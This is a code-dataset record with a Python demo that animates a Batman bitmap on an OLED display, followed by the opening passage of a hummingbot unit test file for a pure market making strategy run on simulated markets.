BatmanDemo.py
pleft/omega-python-oled
6d340f7bf2105cd134af5511f66aa63ceaaed85e
[ "MIT" ]
1
2021-11-28T21:44:41.000Z
2021-11-28T21:44:41.000Z
BatmanDemo.py
pleft/omega-python-oled
6d340f7bf2105cd134af5511f66aa63ceaaed85e
[ "MIT" ]
1
2017-11-14T09:19:52.000Z
2017-11-14T17:48:44.000Z
BatmanDemo.py
pleft/omega-python-oled
6d340f7bf2105cd134af5511f66aa63ceaaed85e
[ "MIT" ]
1
2019-03-25T03:42:28.000Z
2019-03-25T03:42:28.000Z
import OledLib from OmegaExpansion import oledExp from random import randint import time batman = [ [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,0,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,1,1,1], [1,1,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,1,1], [1,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,1,1,1], [1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,1,1], [1,1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,1], [1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1], [1,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1], [1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1], [1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1], [1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1], [1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1], [1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1], [1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1], [1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1], [1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1], [1,1,1,1,0,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,0,1,1,1], [1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,1,1], [1,1,1,1,1,0,0,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,1,1,1], [1,1,1,1,1,1,0,0,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,0,1,1,1,1,1,1], [1,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,0,0,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,0,0,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1], [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1] ] start = int(round(time.time() * 1000)) # bitmap blitting example at random positions oledExp.clear() oledExp.write("Bitmap bliting") time.sleep(2) oledExp.clear() frames = 0 exampleStart = int(round(time.time() * 1000)) for i in range(10): OledLib.putBitmap(randint(0, 60), randint(8, 20), batman) OledLib.blit() frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Bitmap bliting took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) # scalling example (zooming in, both axes scale) oledExp.clear() oledExp.write("Scaling: zoom in") time.sleep(2) frames = 0 exampleStart = int(round(time.time() * 1000)) for scale in range(8, 0, -1): scaledBatman = OledLib.scaleBitmap(batman, scale, scale) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Scaling: zoom in took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) # rotate bitmap 90, 180, 270, 360 degrees oledExp.clear() oledExp.write("Rotation: 90, 180, 270 degrees") time.sleep(2) oledExp.clear() frames = 0 exampleStart = int(round(time.time() * 1000)) rotatedBatman = OledLib.rotateBitmap90(batman) h = len(rotatedBatman) w = len(rotatedBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, rotatedBatman) OledLib.blit() frames += 1 rotatedBatman = OledLib.rotateBitmap180(batman) h = len(rotatedBatman) w = len(rotatedBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, rotatedBatman) OledLib.blit() frames += 1 rotatedBatman = OledLib.rotateBitmap270(batman) h = len(rotatedBatman) w = len(rotatedBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, rotatedBatman) OledLib.blit() frames += 1 h = len(batman) w = len(batman[0]) OledLib.putBitmap(64-w/2, 32-h/2, batman) OledLib.blit() frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Rotation: 90, 180, 270 degrees took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) # scaling example (x-axis only) oledExp.clear() oledExp.write("Scaling: x-axis") time.sleep(2) oledExp.clear() frames = 0 exampleStart = int(round(time.time() * 1000)) scale = 1 while scale<=8: scaledBatman = OledLib.scaleBitmap(batman, scale, 1) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() scale += 1 frames += 1 scale = 8 while scale>0: scaledBatman = OledLib.scaleBitmap(batman, scale, 1) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() scale -= 1 frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Scaling: x-axis took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) # scaling and rotating example (y-axis only) oledExp.clear() oledExp.write("Scaling and rotating: y-axis") time.sleep(2) oledExp.clear() frames = 0 exampleStart = int(round(time.time() * 1000)) OledLib.putBitmap(64-w/2, 32-h/2, batman) OledLib.blit() frames += 1 scale = 1 while scale<=8: scaledBatman = OledLib.scaleBitmap(batman, 1, scale) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() scale += 1 frames += 1 rotatedBatman = OledLib.rotateBitmap180(batman) h = len(rotatedBatman) w = len(rotatedBatman[0]) scale = 8 while scale>0: scaledBatman = OledLib.scaleBitmap(rotatedBatman, 1, scale) h = len(scaledBatman) w = len(scaledBatman[0]) OledLib.putBitmap(64-w/2, 32-h/2, scaledBatman) OledLib.blit() scale -= 1 frames += 1 exampleEnd = int(round(time.time() * 1000)) millis = exampleEnd - exampleStart print("Scaling and rotating: y-axis took: " + str(millis) + " milliseconds") print("Total Frames: " + str(frames)) print("FPS: " + str(frames*1000/float(millis))) time.sleep(1) oledExp.write("Enjoy OledLib!") end = int(round(time.time() * 1000)) print("Demo completed in: " + str(end-start) + " milliseconds.")
45.724138
130
0.593407
3,000
9,282
1.836
0.027333
0.455338
0.62037
0.761801
0.903595
0.870552
0.870552
0.856391
0.844771
0.823711
0
0.299297
0.06518
9,282
203
131
45.724138
0.335485
0.02187
0
0.67033
0
0
0.049372
0
0
0
0
0
0
1
0
false
0
0.021978
0
0.021978
0.087912
0
0
1
null
1
1
1
1
1
1
1
1
1
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
12
82d015988c97ae925e2eadd43142e3b0e6557133
78,102
py
Python
test/test_pure_market_making_v2.py
fakecoinbase/4emslashhummingbot1
74b0ef943770ad141382a3a1851f55998facdac0
[ "Apache-2.0" ]
null
null
null
test/test_pure_market_making_v2.py
fakecoinbase/4emslashhummingbot1
74b0ef943770ad141382a3a1851f55998facdac0
[ "Apache-2.0" ]
null
null
null
test/test_pure_market_making_v2.py
fakecoinbase/4emslashhummingbot1
74b0ef943770ad141382a3a1851f55998facdac0
[ "Apache-2.0" ]
1
2020-05-15T03:37:03.000Z
2020-05-15T03:37:03.000Z
#!/usr/bin/env python from os.path import join, realpath import sys; sys.path.insert(0, realpath(join(__file__, "../../"))) from hummingbot.strategy.market_trading_pair_tuple import MarketTradingPairTuple from decimal import Decimal import logging; logging.basicConfig(level=logging.ERROR) import pandas as pd from typing import List import unittest import time from hummingsim.backtest.backtest_market import BacktestMarket from hummingsim.backtest.market import ( AssetType, Market, MarketConfig, QuantizationParams ) from hummingsim.backtest.mock_order_book_loader import MockOrderBookLoader from hummingbot.core.clock import ( Clock, ClockMode ) from hummingbot.core.event.event_logger import EventLogger from hummingbot.core.event.events import ( MarketEvent, OrderBookTradeEvent, TradeType, OrderType, OrderFilledEvent, BuyOrderCompletedEvent, SellOrderCompletedEvent, TradeFee ) from hummingbot.core.data_type.order_book import OrderBook from hummingbot.core.data_type.order_book_row import OrderBookRow from hummingbot.core.data_type.limit_order import LimitOrder from hummingbot.strategy.pure_market_making.pure_market_making_v2 import PureMarketMakingStrategyV2 from hummingbot.strategy.pure_market_making import ( ConstantSpreadPricingDelegate, PassThroughFilterDelegate, ConstantMultipleSpreadPricingDelegate, ConstantSizeSizingDelegate, StaggeredMultipleSizeSizingDelegate, InventorySkewSingleSizeSizingDelegate, InventorySkewMultipleSizeSizingDelegate, OrderBookAssetPriceDelegate, DataFeedAssetPriceDelegate ) from hummingbot.data_feed.data_feed_base import DataFeedBase from hummingbot.core.utils.exchange_rate_conversion import ExchangeRateConversion from hummingbot.core.network_base import NetworkStatus from hummingbot.client.command.config_command import ConfigCommand class MockDataFeed(DataFeedBase): @property def name(self): return self._name def __init__(self, name, coin_prices): super().__init__() self._name = name self._mock_price_dict = coin_prices self._network_status = NetworkStatus.CONNECTED async def check_network(self) -> NetworkStatus: return NetworkStatus.CONNECTED @property def price_dict(self): return self._mock_price_dict def get_price(self, trading_pair): return self._mock_price_dict.get(trading_pair.upper()) def start(self): pass def stop(self): pass class PureMarketMakingV2UnitTest(unittest.TestCase): start: pd.Timestamp = pd.Timestamp("2019-01-01", tz="UTC") end: pd.Timestamp = pd.Timestamp("2019-01-01 01:00:00", tz="UTC") start_timestamp: float = start.timestamp() end_timestamp: float = end.timestamp() maker_trading_pairs: List[str] = ["COINALPHA-WETH", "COINALPHA", "WETH"] def setUp(self): self.clock: Clock = Clock(ClockMode.BACKTEST, 60.0, self.start_timestamp, self.end_timestamp) self.clock_tick_size = 60 self.maker_market: BacktestMarket = BacktestMarket() self.maker_data: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs) self.mid_price = 100 self.bid_threshold = 0.01 self.ask_threshold = 0.01 self.order_refresh_time = 45 self.maker_data.set_balanced_order_book(mid_price=self.mid_price, min_price=1, max_price=200, price_step_size=1, volume_step_size=10) self.constant_pricing_delegate = ConstantSpreadPricingDelegate(Decimal(self.bid_threshold), Decimal(self.ask_threshold)) self.constant_sizing_delegate = ConstantSizeSizingDelegate(Decimal("1.0")) self.filter_delegate = PassThroughFilterDelegate() self.equal_strategy_sizing_delegate = StaggeredMultipleSizeSizingDelegate( order_start_size=Decimal("1.0"), order_step_size=Decimal("0"), order_levels=Decimal("5") ) self.staggered_strategy_sizing_delegate = StaggeredMultipleSizeSizingDelegate( order_start_size=Decimal("1.0"), order_step_size=Decimal("0.5"), order_levels=Decimal("5") ) self.multiple_order_strategy_pricing_delegate = ConstantMultipleSpreadPricingDelegate( bid_spread=Decimal(self.bid_threshold), ask_spread=Decimal(self.ask_threshold), order_level_spread=Decimal("0.01"), order_levels=Decimal("5") ) self.maker_market.add_data(self.maker_data) self.maker_market.set_balance("COINALPHA", 500) self.maker_market.set_balance("WETH", 5000) self.maker_market.set_balance("QETH", 500) self.maker_market.set_quantization_param( QuantizationParams( self.maker_trading_pairs[0], 6, 6, 6, 6 ) ) self.market_info: MarketTradingPairTuple = MarketTradingPairTuple( *( [self.maker_market] + self.maker_trading_pairs ) ) logging_options: int = (PureMarketMakingStrategyV2.OPTION_LOG_ALL & (~PureMarketMakingStrategyV2.OPTION_LOG_NULL_ORDER_SIZE)) self.strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.constant_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, logging_options=logging_options ) self.multi_order_equal_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, sizing_delegate=self.equal_strategy_sizing_delegate, order_refresh_time=45, logging_options=logging_options ) self.multi_order_staggered_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, sizing_delegate=self.staggered_strategy_sizing_delegate, order_refresh_time=45, logging_options=logging_options ) self.delayed_placement_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.constant_pricing_delegate, sizing_delegate=self.constant_sizing_delegate, order_refresh_time=900, filled_order_delay=80, logging_options=logging_options ) self.penny_jumping_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filter_delegate=self.filter_delegate, pricing_delegate=self.constant_pricing_delegate, sizing_delegate=self.constant_sizing_delegate, order_optimization_enabled=True, order_refresh_time=900, filled_order_delay=80, hanging_orders_enabled=True, logging_options=logging_options ) self.ext_market: BacktestMarket = BacktestMarket() self.ext_data: MockOrderBookLoader = MockOrderBookLoader(*self.maker_trading_pairs) self.ext_market_info: MarketTradingPairTuple = MarketTradingPairTuple( self.ext_market, *self.maker_trading_pairs ) self.ext_data.set_balanced_order_book(mid_price=50, min_price=1, max_price=400, price_step_size=1, volume_step_size=10) self.ext_market.add_data(self.ext_data) self.asset_del = OrderBookAssetPriceDelegate(self.ext_market, self.maker_trading_pairs[0]) self.ext_exc_price_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.constant_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, logging_options=logging_options, asset_price_delegate=self.asset_del ) self.multi_orders_ext_exc_price_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.equal_strategy_sizing_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, order_refresh_time=45, logging_options=logging_options, asset_price_delegate=self.asset_del ) ExchangeRateConversion.set_global_exchange_rate_config({ "global_config": { self.maker_trading_pairs[1]: {"default": 200, "source": "mock_data_feed"}, self.maker_trading_pairs[2]: {"default": 1, "source": "mock_data_feed"} }, "default_data_feed": "mock_data_feed" }) mock_feed = MockDataFeed("mock_data_feed", {self.maker_trading_pairs[1]: 200, self.maker_trading_pairs[2]: 1}) ExchangeRateConversion.set_data_feeds([ mock_feed ]) ExchangeRateConversion.set_update_interval(0.1) ExchangeRateConversion.get_instance().start() time.sleep(1) self.feed_asset_del = DataFeedAssetPriceDelegate(self.maker_trading_pairs[1], self.maker_trading_pairs[2]) self.ext_feed_price_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.constant_sizing_delegate, pricing_delegate=self.constant_pricing_delegate, order_refresh_time=45, logging_options=logging_options, asset_price_delegate=self.feed_asset_del ) self.multi_orders_ext_feed_price_strategy: PureMarketMakingStrategyV2 = PureMarketMakingStrategyV2( [self.market_info], filled_order_delay=self.order_refresh_time, filter_delegate=self.filter_delegate, sizing_delegate=self.equal_strategy_sizing_delegate, pricing_delegate=self.multiple_order_strategy_pricing_delegate, order_refresh_time=45, logging_options=logging_options, asset_price_delegate=self.feed_asset_del ) self.logging_options = logging_options self.clock.add_iterator(self.maker_market) self.clock.add_iterator(self.strategy) self.maker_order_fill_logger: EventLogger = EventLogger() self.cancel_order_logger: EventLogger = EventLogger() self.maker_market.add_listener(MarketEvent.OrderFilled, self.maker_order_fill_logger) self.maker_market.add_listener(MarketEvent.OrderCancelled, self.cancel_order_logger) def simulate_maker_market_trade(self, is_buy: bool, quantity: float): maker_trading_pair: str = self.maker_trading_pairs[0] order_book: OrderBook = self.maker_market.get_order_book(maker_trading_pair) trade_event: OrderBookTradeEvent = OrderBookTradeEvent( maker_trading_pair, self.clock.current_timestamp, TradeType.BUY if is_buy else TradeType.SELL, (self.mid_price * (1 - self.bid_threshold - 0.01) if not is_buy else self.mid_price * (1 + self.ask_threshold + 0.01)), quantity ) order_book.apply_trade(trade_event) # Update the orderbook so that the top bids and asks are lower than actual for a wider bid ask spread # this basially removes the orderbook entries above top bid and below top ask @staticmethod def simulate_order_book_widening(order_book: OrderBook, top_bid: float, top_ask: float): bid_diffs: List[OrderBookRow] = [] ask_diffs: List[OrderBookRow] = [] update_id: int = order_book.last_diff_uid + 1 for row in order_book.bid_entries(): if row.price > top_bid: bid_diffs.append(OrderBookRow(row.price, 0, update_id)) else: break for row in order_book.ask_entries(): if row.price < top_ask: ask_diffs.append(OrderBookRow(row.price, 0, update_id)) else: break order_book.apply_diffs(bid_diffs, ask_diffs, update_id) @staticmethod def simulate_limit_order_fill(market: Market, limit_order: LimitOrder): quote_currency_traded: Decimal = limit_order.price * limit_order.quantity base_currency_traded: Decimal = limit_order.quantity quote_currency: str = limit_order.quote_currency base_currency: str = limit_order.base_currency config: MarketConfig = market.config if limit_order.is_buy: market.set_balance(quote_currency, market.get_balance(quote_currency) - quote_currency_traded) market.set_balance(base_currency, market.get_balance(base_currency) + base_currency_traded) market.trigger_event(MarketEvent.OrderFilled, OrderFilledEvent( market.current_timestamp, limit_order.client_order_id, limit_order.trading_pair, TradeType.BUY, OrderType.LIMIT, limit_order.price, limit_order.quantity, TradeFee(Decimal("0.0")) )) market.trigger_event(MarketEvent.BuyOrderCompleted, BuyOrderCompletedEvent( market.current_timestamp, limit_order.client_order_id, base_currency, quote_currency, base_currency if config.buy_fees_asset is AssetType.BASE_CURRENCY else quote_currency, base_currency_traded, quote_currency_traded, Decimal("0.0"), OrderType.LIMIT )) else: market.set_balance(quote_currency, market.get_balance(quote_currency) + quote_currency_traded) market.set_balance(base_currency, market.get_balance(base_currency) - base_currency_traded) market.trigger_event(MarketEvent.OrderFilled, OrderFilledEvent( market.current_timestamp, limit_order.client_order_id, limit_order.trading_pair, TradeType.SELL, OrderType.LIMIT, limit_order.price, limit_order.quantity, TradeFee(Decimal("0.0")) )) market.trigger_event(MarketEvent.SellOrderCompleted, SellOrderCompletedEvent( market.current_timestamp, limit_order.client_order_id, base_currency, quote_currency, base_currency if config.sell_fees_asset is AssetType.BASE_CURRENCY else quote_currency, base_currency_traded, quote_currency_traded, Decimal("0.0"), OrderType.LIMIT )) def test_confirm_active_bids_asks(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) def test_correct_price_correct_size(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(self.mid_price * (1 + self.ask_threshold), self.strategy.active_asks[0][1].price) self.assertEqual(self.mid_price * (1 - self.bid_threshold), self.strategy.active_bids[0][1].price) self.assertEqual(1, self.strategy.active_bids[0][1].quantity) self.assertEqual(1, self.strategy.active_asks[0][1].quantity) def test_spread_configs_update_single_mode(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(self.mid_price * (1 - Decimal('0.01')), self.strategy.active_bids[0][1].price) self.assertEqual(self.mid_price * (1 + Decimal('0.01')), self.strategy.active_asks[0][1].price) self.assertEqual(1, self.strategy.active_bids[0][1].quantity) self.assertEqual(1, self.strategy.active_asks[0][1].quantity) ConfigCommand.update_running_pure_mm(self.strategy, "bid_spread", Decimal('2')) ConfigCommand.update_running_pure_mm(self.strategy, "ask_spread", Decimal('3')) self.clock.backtest_til(self.start_timestamp + (2 * self.clock_tick_size) + 1) self.assertEqual(self.mid_price * (1 - Decimal('0.02')), self.strategy.active_bids[0][1].price) self.assertEqual(self.mid_price * (1 + Decimal('0.03')), self.strategy.active_asks[0][1].price) def test_check_sufficient_balance(self): self.maker_market.set_balance("WETH", 0) end_ts = self.start_timestamp + self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(0, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) self.maker_market.set_balance("COINALPHA", 0) end_ts += self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(0, len(self.strategy.active_bids)) self.assertEqual(0, len(self.strategy.active_asks)) self.maker_market.set_balance("COINALPHA", 500) self.maker_market.set_balance("WETH", 500) end_ts += self.clock_tick_size self.clock.backtest_til(end_ts) self.assertEqual(1, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) def test_check_if_active_orders_are_cancelled_every_tick(self): end_ts = self.start_timestamp + self.clock_tick_size self.clock.backtest_til(end_ts) old_bid = self.strategy.active_bids[0][1] old_ask = self.strategy.active_asks[0][1] self.assertEqual(1, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) end_ts += self.clock_tick_size + 1 self.clock.backtest_til(end_ts) new_bid = self.strategy.active_bids[0][1] new_ask = self.strategy.active_asks[0][1] self.assertNotEqual(old_ask, new_ask) self.assertNotEqual(old_bid, new_bid) def test_order_fills(self): self.clock.backtest_til(self.start_timestamp + self.clock_tick_size) self.assertEqual(1, len(self.strategy.active_bids)) self.assertEqual(1, len(self.strategy.active_asks)) bid_order: LimitOrder = self.strategy.active_bids[0][1] ask_order: LimitOrder = self.strategy.active_asks[0][1] self.assertEqual(Decimal("99"), bid_order.price) self.assertEqual(Decimal("101"), ask_order.price) self.assertEqual(Decimal("1.0"), bid_order.quantity) self.assertEqual(Decimal("1.0"), ask_order.quantity) self.simulate_maker_market_trade(True, 5.0) self.clock.backtest_til(self.start_timestamp + 2 * self.clock_tick_size + 1) self.assertEqual(1, len(self.maker_order_fill_logger.event_log)) maker_fill: OrderFilledEvent = self.maker_order_fill_logger.event_log[0] self.assertEqual(TradeType.SELL, 